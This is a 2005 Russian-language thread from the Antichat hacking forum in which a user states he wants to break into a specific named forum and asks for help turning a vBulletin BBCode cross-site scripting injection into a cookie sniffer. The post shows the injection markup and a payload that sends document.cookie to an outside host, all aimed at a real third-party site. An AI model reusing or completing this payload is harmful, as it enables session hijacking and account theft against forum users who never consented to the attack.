ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы с vBulletin
  #1  
Старый 18.12.2005, 03:49
Аватар для KP0T
KP0T
Новичок
Регистрация: 13.03.2005
Сообщений: 29
Провел на форуме:
111754

Репутация: 0
По умолчанию Проблемы с vBulletin

Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/

вот этот код
Код:
[HTML]http://www.wj.com]wj wj[/URL]
даёт нам что-то типа
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj 
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 &quot;>wj</FONT>" 
target="_blank"&gt;http://www.wj.com]wj &lt;font face="Ar.../) 
/"&gt;wj&lt;/font&gt;</A></A>
Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа
Нехрена нам не даёт, а именно в сорцах всё смотрится так
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' 
target=_blank>wj[FONT=Arial size=+7 
style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); 
/]wj [/FONT]" target="_blank"&gt;http://www.wj.com]wj[FONT=Arial...]wj 
[/FONT</A>
Вообщем ай нид хелп.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
перловый брутфорс md5 DetMyl PHP, PERL, MySQL, JavaScript 2 26.12.2005 15:52
vBulletin Version 3.0.7 Enter.beta Форумы 9 11.11.2005 01:57
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ